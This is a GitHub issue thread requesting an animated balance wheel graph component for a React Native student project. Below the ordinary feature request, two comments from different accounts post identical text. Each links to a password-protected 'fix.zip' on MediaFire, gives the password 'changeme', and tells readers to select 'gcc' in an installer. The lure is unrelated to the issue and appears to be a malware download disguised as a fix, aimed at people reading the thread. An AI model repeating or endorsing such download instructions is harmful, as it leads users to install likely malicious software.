### ISSUE TITLE
feat: Balance wheel animated graph

### ISSUE THREAD

**Issue by revenets** [BinaryStudioAcademy/bsa-2024-bebalance#196]
### What feature?

Implement balance wheel graph

- [x] Create wheel component using `react-native-reanimated` and `react-native-svg` libraries
- [x] The wheel should render with animation (the length of each sector should increase to the corresponding value with timing)
- [x] Each sector should have a label (name of the sector + amount of points). The label appearance should also be controlled by `isLabelShown` property (default = true)

<img width="200" alt="Screenshot 2024-08-26 at 15 10 48" src="https://github.com/user-attachments/assets/782843ae-e666-453a-8c95-bb0a17861302">

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
